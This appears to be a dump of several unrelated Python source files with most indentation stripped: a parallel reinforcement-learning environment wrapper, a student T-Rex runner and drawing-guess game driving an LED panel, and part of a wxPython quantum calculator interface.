self.setProgressBarEnabled(False)
self.showDialogSignal.connect(self.showDialog)
if __name__ == '__main__':
# def run():
main = Main()
app = QApplication(sys.argv)
main.window = QMainWindow()
main.ui = Ui_MainWindow()
main.ui.setupUi(main.window)
main.setup_ui()
main.window.show()
logging.debug("Handing Process Over To UI Thread...")
sys.exit(app.exec_())
|
subproc_vec_env.py
|
import multiprocessing as mp
import numpy as np
from .vec_env import VecEnv, CloudpickleWrapper, clear_mpi_env_vars
def worker(remote, parent_remote, env_fn_wrappers):
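    # Runs in each subprocess: builds the envs from env_fn_wrappers and serves
    # (cmd, data) requests received over the pipe ('step', 'reset', 'render',
    # 'close', 'get_spaces_spec'), resetting an env automatically when it reports done.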
def step_env(env, action):
ob, reward, done, info = env.step(action)
if done:
ob = env.reset()
return ob, reward, done, info
parent_remote.close()
envs = [env_fn_wrapper() for env_fn_wrapper in env_fn_wrappers.x]
try:
while True:
cmd, data = remote.recv()
if cmd == 'step':
remote.send([step_env(env, action) for env, action in zip(envs, data)])
elif cmd == 'reset':
remote.send([env.reset() for env in envs])
elif cmd == 'render':
remote.send([env.render(mode='rgb_array') for env in envs])
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces_spec':
remote.send(CloudpickleWrapper((envs[0].observation_space, envs[0].action_space, envs[0].spec)))
else:
raise NotImplementedError
except KeyboardInterrupt:
print('SubprocVecEnv worker: got KeyboardInterrupt')
finally:
for env in envs:
env.close()
class SubprocVecEnv(VecEnv):
"""
    VecEnv that runs multiple environments in parallel in subprocesses and communicates with them via pipes.
Recommended to use when num_envs > 1 and step() can be a bottleneck.
"""
def __init__(self, env_fns, spaces=None, context='spawn', in_series=1, worker=worker):
"""
Arguments:
env_fns: iterable of callables - functions that create environments to run in subprocesses. Need to be cloud-pickleable
in_series: number of environments to run in series in a single process
(e.g. when len(env_fns) == 12 and in_series == 3, it will run 4 processes, each running 3 envs in series)
worker: worker function. Needs to be pickleable.
"""
self.waiting = False
self.closed = False
self.in_series = in_series
nenvs = len(env_fns)
assert nenvs % in_series == 0, "Number of envs must be divisible by number of envs to run in series"
self.nremotes = nenvs // in_series
env_fns = np.array_split(env_fns, self.nremotes)
ctx = mp.get_context(context)
self.remotes, self.work_remotes = zip(*[ctx.Pipe() for _ in range(self.nremotes)])
self.ps = [ctx.Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
with clear_mpi_env_vars():
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces_spec', None))
observation_space, action_space, self.spec = self.remotes[0].recv().x
self.viewer = None
VecEnv.__init__(self, nenvs, observation_space, action_space)
def step_async(self, actions):
self._assert_not_closed()
actions = np.array_split(actions, self.nremotes)
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
self._assert_not_closed()
results = [remote.recv() for remote in self.remotes]
results = _flatten_list(results)
self.waiting = False
obs, rews, dones, infos = zip(*results)
return _flatten_obs(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
self._assert_not_closed()
for remote in self.remotes:
remote.send(('reset', None))
obs = [remote.recv() for remote in self.remotes]
obs = _flatten_list(obs)
return _flatten_obs(obs)
def close_extras(self):
self.closed = True
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
def get_images(self):
self._assert_not_closed()
for pipe in self.remotes:
pipe.send(('render', None))
imgs = [pipe.recv() for pipe in self.remotes]
imgs = _flatten_list(imgs)
return imgs
def _assert_not_closed(self):
assert not self.closed, "Trying to operate on a SubprocVecEnv after calling close()"
def __del__(self):
if not self.closed:
self.close()
def _flatten_obs(obs):
assert isinstance(obs, (list, tuple))
assert len(obs) > 0
if isinstance(obs[0], dict):
keys = obs[0].keys()
return {k: np.stack([o[k] for o in obs]) for k in keys}
else:
return np.stack(obs)
def _flatten_list(l):
assert isinstance(l, (list, tuple))
assert len(l) > 0
assert all([len(l_) > 0 for l_ in l])
return [l__ for l_ in l for l__ in l_]
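# For reference: _flatten_list([[a, b], [c]]) -> [a, b, c]; _flatten_obs stacks
# the observations from all envs (per key when the observations are dicts).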
|
game_ver4.py
|
import pygame
from random import *
from turtle import *
import time
import led_display as led
import threading
#################### T-REX RUN ####################
pygame.init()
Pixel = 30
win = pygame.display.set_mode((32*Pixel, 16*Pixel))
X = 3 * Pixel
Y = 16 * Pixel - Pixel
vel_x = 10
vel_y = 10
jump = False
Eaten_Box = set()
eaten_color = 0
BLACK = (0, 0, 0)
RED = (150, 0, 0)
GREEN = (0, 50, 0)
YELLOW = (255, 255, 51)
BLUE =(0, 0, 204)
PURPLE =(204, 0, 204)
SKYBLUE = (0, 216, 255)
WHITE = (255, 255, 255)
Color_Set = [RED, GREEN, YELLOW, BLUE, PURPLE, SKYBLUE, WHITE]
spd = 0.4
run = False
dino_array = [ [ 1, 0, 0, 0, 1, 0 ],
[ 1, 0, 0, 1, 1, 1 ],
[ 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 0, 0 ],
[ 0, 1, 1, 1, 0, 0 ],
[ 0, 1, 0, 0, 0, 0 ] ]
Ducked_dino_array= [ [ 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0 ],
[ 1, 1, 1, 1, 1, 1 ],
[ 0, 1, 1, 1, 1, 1 ],
[ 0, 1, 1, 1, 0, 0 ],
[ 0, 1, 0, 0, 0, 0 ] ]
ptera_array = [ [ 0, 0, 0, 0 ],
[ 0, 1, 0, 0 ],
[ 1, 1, 1, 1 ],
[ 0, 0, 0, 0 ] ]
Cactus_array = [ [ 0, 0, 1, 0 ],
[ 0, 1, 1, 1 ],
[ 0, 0, 1, 0 ],
[ 0, 0, 1, 0 ] ]
background = [[0 for x in range(32)] for x in range(16)]
def LED_init():
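    # Run the LED display driver (led.main) in a background daemon thread so it
    # does not block the pygame loop and exits together with the game process.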
    t = threading.Thread(target=led.main, args=())
    t.daemon = True
    t.start()
return
class Dino():
def __init__(self, x, y):
self.x = x
self.y = y
self.vel_x = 10
self.vel_y = 10
self.Bowdown = 0
self.Col_U_D = 0
self.Col_L_D = 0
def draw(self):
if self.Bowdown == 0:
for i in range(6):
for j in range(6):
if dino_array[i][j] == 1:
pygame.draw.rect(win, WHITE, [int(self.x+j*Pixel), int(self.y+i*Pixel-5*Pixel), Pixel, Pixel])
led.set_pixel(int((self.x+j*Pixel)/Pixel), int((self.y+i*Pixel-5*Pixel)/Pixel), 3)
self.Col_U_D = pygame.Rect(int(self.x+0*Pixel), int(self.y-5*Pixel), 6*Pixel, 3*Pixel)
self.Col_L_D = pygame.Rect([int(self.x+Pixel), int(self.y-2*Pixel), 3*Pixel, 2*Pixel])
else:
for i in range(6):
for j in range(6):
if Ducked_dino_array[i][j] == 1:
pygame.draw.rect(win, WHITE, [int(self.x+j*Pixel), int(self.y+i*Pixel-5*Pixel), Pixel, Pixel])
led.set_pixel(int((self.x+j*Pixel)/Pixel), int((self.y+i*Pixel-5*Pixel)/Pixel), 3)
self.Col_U_D = pygame.Rect(int(self.x+0*Pixel), int(self.y-3*Pixel), 6*Pixel, 2*Pixel)
self.Col_L_D = pygame.Rect([int(self.x+1*Pixel), int(self.y-Pixel), 3*Pixel, 2*Pixel])
class Cactus():
def __init__(self):
self.Cacti_loc_x = 32
self.Cacti_loc_y = 16
self.Col_C_X = 0
self.Col_C_Y = 0
self.disappear = False
def draw(self):
if self.disappear == False:
for i in range(4):
for j in range(4):
if Cactus_array[i][j] == 1:
pygame.draw.rect(win, GREEN, [int((self.Cacti_loc_x*Pixel - Pixel)+j*Pixel), int((self.Cacti_loc_y * Pixel - 4*Pixel)+i*Pixel), Pixel, Pixel])
led.set_pixel(int(((self.Cacti_loc_x*Pixel - Pixel)+j*Pixel)/Pixel), int(((self.Cacti_loc_y*Pixel -4*Pixel)+i*Pixel)/Pixel), 3)
self.Col_C_X = pygame.Rect(int(self.Cacti_loc_x*Pixel - 0*Pixel), int(self.Cacti_loc_y * Pixel - 3*Pixel), 3*Pixel, Pixel)
self.Col_C_Y = pygame.Rect(int(self.Cacti_loc_x*Pixel - (-1)*Pixel), int(self.Cacti_loc_y * Pixel - 4*Pixel), Pixel, 4*Pixel)
else:
pass
def update(self):
self.Cacti_loc_x -= 1.3 * spd
if int(self.Cacti_loc_x*Pixel - Pixel) <= 0:
self.Cacti_loc_x = randint(32, 100)
self.disappear = False
class Box():
def __init__(self):
self.Box_loc_x = 45
self.Box_loc_y = 16
self.Col_B = 0
self.rand = 7
self.COLOR = WHITE
self.disappear = False
def draw(self):
if self.disappear == False:
pygame.draw.rect(win, self.COLOR, [int(self.Box_loc_x*Pixel - Pixel), int(self.Box_loc_y * Pixel - 10*Pixel), Pixel, Pixel])
led.set_pixel(int((self.Box_loc_x*Pixel - Pixel)/Pixel), int((self.Box_loc_y*Pixel - 10*Pixel)/Pixel), self.rand+1)
else:
pass
self.Col_B = pygame.Rect(int(self.Box_loc_x*Pixel - Pixel), int(self.Box_loc_y * Pixel - 10*Pixel), Pixel, Pixel)
def update(self):
self.Box_loc_x -= spd
if int(self.Box_loc_x*Pixel - Pixel) <= 0:
self.rand = randint(0, 6)
self.COLOR = Color_Set[self.rand]
self.Box_loc_x = randint(32, 100)
self.Box_loc_y = randint(14, 20)
self.disappear = False
class Ptera():
def __init__(self):
self.Ptera_loc_x = 64
self.Ptera_loc_y = 16
self.Col_P = 0
self.disappear = False
def draw(self):
if self.disappear == False:
for i in range(4):
for j in range(4):
if ptera_array[i][j] == 1:
pygame.draw.rect(win, YELLOW, [int((self.Ptera_loc_x*Pixel - Pixel)+j*Pixel), int((self.Ptera_loc_y * Pixel - 7*Pixel)+i*Pixel), Pixel, Pixel])
led.set_pixel(int(((self.Ptera_loc_x*Pixel - Pixel)+j*Pixel)/Pixel), int(((self.Ptera_loc_y*Pixel - 7*Pixel)+i*Pixel)/Pixel), 4)
self.Col_P = pygame.Rect(int(self.Ptera_loc_x*Pixel - Pixel), int((self.Ptera_loc_y * Pixel - 6*Pixel)+0*Pixel), 4*Pixel, 2*Pixel)
else:
pass
#pygame.draw.rect(win, ORANGE, [int(self.Ptera_loc_x*Pixel - Pixel), int(self.Ptera_loc_y * Pixel - 4*Pixel), Pixel, Pixel])
def update(self):
self.Ptera_loc_x -= spd * 2
if int(self.Ptera_loc_x*Pixel - Pixel) <= 0:
self.Ptera_loc_x = randint(32, 100)
self.Ptera_loc_y = randint(13, 16)
self.disappear = False
class Fireball():
def __init__(self):
self.Fireball_loc_x = D.x + 6*Pixel
self.Fireball_loc_y = 0
self.COLOR = RED
self.Col_F = 0
self.collision = False
self.Shoot = False
def draw(self):
pygame.draw.rect(win, self.COLOR, [self.Fireball_loc_x, self.Fireball_loc_y, Pixel, Pixel])
led.set_pixel(int(self.Fireball_loc_x/Pixel) + 6, int((self.Fireball_loc_y)/Pixel), 1)
self.Col_F = pygame.Rect(self.Fireball_loc_x, self.Fireball_loc_y, Pixel, Pixel)
self.Fireball_loc_x += Pixel
def update(self):
if self.collision == True or self.Fireball_loc_x >= 33*Pixel:
self.Fireball_loc_x = D.x + 6*Pixel
self.collision = False
self.Shoot = False
# self.COLOR = choice(list(Eaten_Box))
class Background():
def draw(self):
for i in range(16):
for j in range(32):
if background[i][j] == 0:
led.set_pixel(j, i, 0)
LED_init()
S = Background()
D = Dino(X, Y)
C = Cactus()
B = Box()
P = Ptera()
F = Fireball()
intro = True
while intro:
win.fill(BLACK)
D.draw()
for event in pygame.event.get():
if event.type == pygame.QUIT:
intro = False
run = False
userInput = pygame.key.get_pressed()
if userInput[pygame.K_SPACE]:
intro = False
run = True
pygame.display.update()
while run:
win.fill(BLACK)
for i, v in enumerate(list(Eaten_Box)):
pygame.draw.rect(win, v, [31*Pixel-i*Pixel, 0*Pixel, Pixel, Pixel])
background[0][31-i] = 1
for c in range(7):
if v == Color_Set[c]:
eaten_color = c
led.set_pixel(int((31*Pixel - i*Pixel)/Pixel), 0, eaten_color+1)
S.draw()
D.draw()
C.draw()
B.draw()
P.draw()
# Eaten_Box.discard(F.COLOR)
P.update()
C.update()
B.update()
F.update()
if F.Shoot:
F.draw()
for i in [C.Col_C_X, C.Col_C_Y]:
if i.colliderect(F.Col_F):
F.collision = True
C.disappear = True
if P.Col_P.colliderect(F.Col_F):
P.disappear = True
F.collision = True
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
userInput = pygame.key.get_pressed()
# Ducking
if userInput[pygame.K_DOWN]:
D.Bowdown = Pixel
else:
D.Bowdown = 0
# Jump
if jump is False and userInput[pygame.K_SPACE]:
jump = True
if jump is True:
D.y -= vel_y*4
vel_y -= 1
if vel_y < -10:
jump = False
vel_y = 10
# Shoot
if userInput[pygame.K_UP]:
F.Fireball_loc_y = D.y - 3*Pixel
# if len(Eaten_Box) != 0:
F.Shoot = True
# print(Eaten_Box)
for i in [D.Col_L_D, D.Col_U_D]:
if i.colliderect(P.Col_P):
print("Game Over!")
run = False
if i.colliderect(B.Col_B):
Eaten_Box.add(B.COLOR)
B.disappear = True
if i.colliderect(C.Col_C_X) or i.colliderect(C.Col_C_Y):
print("Game Over!")
run = False
pygame.time.delay(25)
pygame.display.update()
S.draw()
time.sleep(1)
#################### END of T-REX RUN ####################
mid_screen = [ [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0 ],
[ 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0 ],
[ 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0 ],
[ 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0 ],
[ 0, 0, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 1, 1, 0 ],
[ 0, 1, 1, 0, 1, 1, 0, 0, 1, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 0, 0, 1, 0, 1, 0, 0, 1 ],
[ 0, 1, 0, 1, 0, 1, 0 ,0, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1 ],
[ 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1 ],
[ 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 1, 1, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ] ]
digit_num = [ [ [ 0, 0, 1 ], [ 0, 0, 1 ], [ 0, 0, 1 ], [ 0, 0, 1 ], [ 0, 0, 1 ] ], #1
[ [ 1, 1, 1 ], [ 0, 0, 1 ], [ 1, 1, 1 ], [ 1, 0, 0 ], [ 1, 1, 1 ] ], #2
[ [ 1, 1, 1 ], [ 0, 0, 1 ], [ 1, 1, 1 ], [ 0, 0, 1 ], [ 1, 1, 1 ] ], #3
[ [ 1, 0, 1 ], [ 1, 0, 1 ], [ 1, 1, 1 ], [ 0, 0, 1 ], [ 0, 0, 1 ] ], #4
[ [ 1, 1, 1 ], [ 1, 0, 0 ], [ 1, 1, 1 ], [ 0, 0, 1 ], [ 1, 1, 1 ] ], #5
[ [ 1, 1, 1 ], [ 1, 0, 0 ], [ 1, 1, 1 ], [ 1, 0, 1 ], [ 1, 1, 1 ] ], #6
[ [ 1, 1, 1 ], [ 1, 0, 1 ], [ 1, 0, 1 ], [ 0, 0, 1 ], [ 0, 0, 1 ] ], #7
[ [ 1, 1, 1 ], [ 1, 0, 1 ], [ 1, 1, 1 ], [ 1, 0, 1 ], [ 1, 1, 1 ] ], #8
[ [ 1, 1, 1 ], [ 1, 0, 1 ], [ 1, 1, 1 ], [ 0, 0, 1 ], [ 0, 0, 1 ] ], #9
[ [ 1, 1, 1 ], [ 1, 0, 1 ], [ 1, 0, 1 ], [ 1, 0, 1 ], [ 1, 1, 1 ] ] ] #0
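# digit_num holds 5x3 bitmap glyphs for the digits, ordered 1-9 with 0 last (index 9).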
class MidScreen():
def draw():
for i in range(7):
for j in range(32):
if mid_screen[i][j] == 1:
led.set_pixel(j, i, 2)
for i in range(7, 16, 1):
for j in range(13):
if mid_screen[i][j] == 1:
led.set_pixel(j, i, 6)
for j in range(13, 32, 1):
if mid_screen[i][j] == 1:
led.set_pixel(j, i, 3)
MidScreen.draw()
time.sleep(3)
S.draw()
#################### CATCH MIND ####################
# colorlistcnt: per-color count of the blocks collected in the dino game
# colorlist: the available colors (red, green, yellow, blue, purple, skyblue, white)
print(Eaten_Box)
colorlist=["red", "green", "yellow", "blue", "purple", "skyblue", "white"]
colorlistcnt=[0,0,0,0,0,0,0]
for i in Eaten_Box:
if i in Color_Set:
colorlistcnt[Color_Set.index(i)] += 1
# RED, GREEN, YELLOW, BLUE, PURPLE, SKYBLUE, WHITE
print(colorlistcnt)
kkk=input("그릴 것을 입력하시오 : ")
print("그림이 완성되면 space를 누르시오")
# record the start time
start=time.time()
bgcolor("black")
pencolor("white")
title("Catch my drawing")
#화면 설정
setup(1600,800)
hideturtle()
speed(0)
pensize(5)
# horizontal grid lines
h=-350
for i in range(15):
up()
goto(-800,h)
down()
forward(1600)
h+=50
# vertical grid lines
v=-750
setheading(-90)
for i in range(31):
up()
goto(v,-400)
down()
backward(800)
v+=50
# paint a swatch on the screen for each color
def drawColor(color,b):
pensize(30)
pencolor(color)
up()
goto(725,b)
down()
goto(725,b-15)
# show which colors are available on the palette
for i in range(0,7,1):
if colorlistcnt[i]>0:
drawColor(colorlist[i],335-i*50)
# close the program (window)
def endP():
bye()
# check the answer
def answer(mmm):
    if mmm == kkk:
        #timer = round(time.time() - start, 3)
        timer = '{:.3f}'.format(round(time.time() - start, 3))
        print("걸린 시간:", timer)
        ID = input("이름을 입력해주세요 : ")
        f = open("osscap2020.txt", 'a')
        data = str(timer)
        f.write(ID + ' : ' + data + 'sec' + '\n')
        f.close()
        wantList = input("기록 출력은 a, 종료는 q를 입력해주세요 : ")
        if wantList == "a":
            f = open("osscap2020.txt", 'r')
            while True:
                line = f.readline()
                if not line: break
                print(line)
            f.close()
            ### ending screen display ###
        else:
            f.close()
    else:print("정답이 아닙니다.")
while(1):
    mmm=input("정답을 입력하시오 : ")
    answer(mmm)
    if (mmm==kkk):
        break
# paint grid cells according to mouse clicks
ledcolor = 7
def drawShape(x,y):
global ledcolor
if 700<=x<=750:
for k in range(0,7,1):
if 300-50*k<y<=350-50*k:
if colorlistcnt[k]>0:
pencolor(colorlist[k])
ledcolor = k+1
a=x-x%50+25
b=(y//50+1)*50
up()
goto(a,b-15)
down()
goto(a,b-30)
led.set_pixel(int((a+775)/50), int((400-b)/50), ledcolor)
onkey(endP,"space")
listen()
onscreenclick(drawShape)
mainloop()
|
interface.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Quantum Calculator User Interface Module
Author: Hideto Manjo
Licence: Apache License 2.0
'''
import sys
import time
import threading
import os
import configparser
import wx
from libqc import QC
VERSION_TEXT = '0.0.2'
CONFIG_FILENAME = './default.conf'
# default configure load
CONF = configparser.ConfigParser()
if os.path.isfile(CONFIG_FILENAME) is False:
sys.stdout.write('{0} not found -> init\n'.format(CONFIG_FILENAME))
CONF['DEFAULT'] = {
'backend': 'local_qasm_simulator',
'remote': 'no',
'qubits': '3',
'qubits_max': '8',
'qubits_min': '1'
}
with open(CONFIG_FILENAME, 'w') as fp:
CONF.write(fp)
CONF.read(CONFIG_FILENAME)
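# With the defaults above, the generated default.conf written by configparser looks roughly like:
#   [DEFAULT]
#   backend = local_qasm_simulator
#   remote = no
#   qubits = 3
#   qubits_max = 8
#   qubits_min = 1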
class Calculator(wx.Frame):
'''
Calculator Frame
'''
# pylint: disable=too-many-ancestors
def __init__(self):
super(Calculator, self).__init__(None,
wx.ID_ANY,
'Quantum Calculator',
size=(320, 270),
style=(wx.DEFAULT_FRAME_STYLE ^
wx.RESIZE_BORDER ^
wx.MAXIMIZE_BOX))
self.__qc = QC(backend=CONF['DEFAULT'].get('backend',
'local_qasm_simulator'),
remote=CONF['DEFAULT'].getboolean('remote'),
qubits=CONF['DEFAULT'].getint('qubits', 3))
# flags
self.busy = False
self.init = True
# variables
self.base = 'dec'
# status bar
self.CreateStatusBar()
self.GetStatusBar().SetBackgroundColour(None)
self.SetStatusText('QC Ready.')
# menu bar
self.menu = Menu(self)
self.SetMenuBar(self.menu)
# panel class
root_panel = wx.Panel(self, wx.ID_ANY)
self.text_panel = TextPanel(root_panel)
self.calcbutton_panel = CalcButtonPanel(root_panel)
root_layout = wx.BoxSizer(wx.VERTICAL)
root_layout.Add(self.text_panel, 0, wx.GROW | wx.ALL, border=10)
root_layout.Add(self.calcbutton_panel, 0, wx.GROW | wx.ALL, border=10)
root_panel.SetSizer(root_layout)
root_layout.Fit(root_panel)
self.Bind(wx.EVT_MENU, self.select_menu)
# BIND FUNCTION
def select_menu(self, event):
'''
select_menu
'''
menuid = event.GetId()
if menuid == 1:
self.Close(True)
elif menuid >= 2000 and menuid < 3000:
self.set_backend(self.menu.id2backend[menuid])
elif menuid > 4000 and menuid < 5000:
qubits = int(menuid - 4000)
self.__qc.set_config({'qubits': qubits})
self.SetStatusText('Set Qubit -> {0} (0-{1}),'
' circuit requires {2} qubits at least.'
.format(qubits, 2**qubits - 1, qubits * 2 + 2))
self.calcbutton_panel.check_calctext()
elif menuid == 29:
self.SetStatusText('Loading remote backend')
self.menu.reload_backend_menu(remote=True)
self.SetStatusText('Updated')
elif menuid == 31:
self.change_base('dec')
elif menuid == 32:
self.change_base('bin')
elif menuid == 9:
box = wx.MessageDialog(None,
'Quantum Calculator v{}\n\n'
'https://github.com/hotstaff/qc\n'
'Apache Licence 2.0\n'
'© 2017 Hideto Manjo'
.format(VERSION_TEXT),
'About Quantum Calculator',
wx.OK | wx.ICON_NONE | wx.STAY_ON_TOP)
box.ShowModal()
box.Destroy()
# BIND FUNCTION END
def get_qc(self):
'''
        return the quantum calculator instance
'''
return self.__qc
def set_backend(self, backend):
'''
set_backend
'''
self.SetStatusText('Loading {}...'.format(backend))
self.__qc.set_config({'backend': backend})
if self.__qc.load():
self.SetStatusText('Ready to use {}'.format(backend))
else:
self.SetStatusText('{} is busy'.format(backend))
def change_base(self, base='dec'):
'''
change_base
'''
self.text_panel.calc_text.Clear()
self.base = base
self.change_button_visible()
self.SetStatusText('Set input mode to {}'
.format('Binary' if base == 'bin' else 'Decimal'))
def change_button_visible(self):
'''
change button visible
'''
if self.base == 'bin':
self.calcbutton_panel.button['0'].Enable()
self.calcbutton_panel.button['1'].Enable()
for i in range(2, 10):
self.calcbutton_panel.button[str(i)].Disable()
else:
for i in range(0, 10):
self.calcbutton_panel.button[str(i)].Enable()
class Menu(wx.MenuBar):
'''
Menu
'''
# pylint: disable=too-few-public-methods
def __init__(self, frame):
super(Menu, self).__init__(wx.ID_ANY)
self.frame = frame
self.__qc = self.frame.get_qc()
menu_view = wx.Menu()
menu_view.AppendRadioItem(31, 'Decimal')
menu_view.AppendRadioItem(32, 'Binary')
self.menu_backend = wx.Menu()
self.id2backend = {}
self.reload_backend_menu()
self.menu_backend.AppendSeparator()
self.menu_backend.Append(29, 'Import Qconfig.py')
menu_circuit = wx.Menu()
qubits_max = CONF['DEFAULT'].getint('qubits_max', 8)
qubits_min = CONF['DEFAULT'].getint('qubits_min', 1)
for i in range(qubits_min, qubits_max + 1):
menu_circuit.AppendRadioItem(4000 + i, str(i))
menu_circuit.Check(4000 + int(self.__qc.qubits), True)
menu_help = wx.Menu()
menu_help.Append(9, 'About')
self.Append(menu_view, 'Input')
self.Append(menu_circuit, 'Qubit')
self.Append(self.menu_backend, 'Backend')
self.Append(menu_help, 'Help')
def reload_backend_menu(self, remote=False):
'''
reload backend menu
'''
for ident in self.id2backend:
self.menu_backend.Delete(ident)
if remote is True:
self.__qc.set_config({'remote': True})
self.__qc.load()
backends = self.__qc.backends
disable_backends = [
'local_unitary_simulator',
'local_clifford_simulator',
'ibmqx4'
]
# disable
for backend in backends[:]:
for disable_backend in disable_backends:
if backend == disable_backend:
backends.pop(backends.index(backend))
disable_backends.pop(disable_backends.index(backend))
for i, backend in enumerate(backends):
menuid = 2000 + i
if 'local' in backend:
menutitle = 'Local ({})'.format(backend)
elif 'ibmqx' in backend:
if 'simulator' in backend:
menutitle = 'IBM Q - Simulator ({})'.format(backend)
else:
menutitle = 'IBM Q - Real device ({})'.format(backend)
else:
menutitle = 'Remote ({})'.format(backend)
self.menu_backend.InsertRadioItem(i, menuid, menutitle)
if backend == self.__qc.backend:
self.menu_backend.Check(menuid, True)
self.id2backend[2000 + i] = backend
class TextPanel(wx.Panel):
'''
TextPanel
'''
# pylint: disable=too-few-public-methods
def __init__(self, parent):
super(TextPanel, self).__init__(parent, wx.ID_ANY)
self.calc_text = wx.TextCtrl(self,
wx.ID_ANY,
style=wx.TE_RIGHT | wx.TE_READONLY)
font = wx.Font(20,
wx.FONTFAMILY_DEFAULT,
wx.FONTSTYLE_NORMAL,
wx.FONTWEIGHT_NORMAL)
self.calc_text.SetFont(font)
layout = wx.BoxSizer(wx.HORIZONTAL)
layout.Add(self.calc_text, 1)
self.SetSizer(layout)
class CalcButtonPanel(wx.Panel):
'''
CalcButtonPanel
'''
def __init__(self, parent):
super(CalcButtonPanel, self).__init__(parent, wx.ID_ANY)
# frame property
self.frame = parent.GetParent()
self.__qc = self.frame.get_qc()
self.calc_text = self.frame.text_panel.calc_text
# (label, buttonid, display)
button_collection = [
('7', 107, '7'),
('8', 108, '8'),
('9', 109, '9'),
('CE', 200, ''),
('4', 104, '4'),
('5', 105, '5'),
('6', 106, '6'),
('-', 201, '-'),
('1', 101, '1'),
('2', 102, '2'),
('3', 103, '3'),
('+', 202, '+'),
('0', 100, '0'),
('B', 401, ''),
('H', 300, 'H'),
('=', 203, '=')
]
# buttons
self.button = {}
self.buttonid2label = {}
for (label, buttonid, display) in button_collection:
if buttonid == 401:
self.button[label] = wx.Button(self,
buttonid,
'',
size=(30, 30))
continue
self.button[label] = wx.Button(self,
buttonid,
label,
size=(30, 30))
self.buttonid2label[str(buttonid)] = (label, display)
# button layout
layout = wx.GridSizer(4, 4, 3, 3)
for (label, buttonid, display) in button_collection:
layout.Add(self.button[label], 1, wx.GROW)
self.SetSizer(layout)
        # the B button is disabled
self.button['B'].Disable()
# bind button event
for i in range(10):
self.Bind(wx.EVT_BUTTON,
self._click_num_button,
self.button[str(i)])
self.Bind(wx.EVT_BUTTON, self._click_num_button, self.button['H'])
self.Bind(wx.EVT_BUTTON, self._click_ce_button, self.button['CE'])
self.Bind(wx.EVT_BUTTON, self._click_ope_button, self.button['+'])
self.Bind(wx.EVT_BUTTON, self._click_ope_button, self.button['-'])
self.Bind(wx.EVT_BUTTON, self._click_e_button, self.button['='])
@staticmethod
def show_alart(title, text):
'''
show_alart
'''
width = 128
if len(text) > width:
split_text = [text[i: i+width] for i in range(0, len(text), width)]
text = "\n".join(split_text)
dialog = wx.MessageDialog(None, text, title, style=wx.ICON_NONE)
dialog.ShowModal()
dialog.Destroy()
# BIND FUNCTIONS
def _click_num_button(self, event):
if self.frame.busy:
return False
if self.frame.init:
self.calc_text.Clear()
self.frame.init = False
display = self.buttonid2label[str(event.GetId())][1]
self.calc_text.AppendText(display)
self.check_calctext()
return True
def _click_ope_button(self, event):
self._click_num_button(event)
def _click_ce_button(self, _event):
if self.frame.busy:
return False
self.button['='].Disable()
self.calc_text.Clear()
self.frame.SetStatusText('Clear')
return True
def _click_e_button(self, _event):
if self.frame.busy is False and self.frame.init is False:
self._calc()
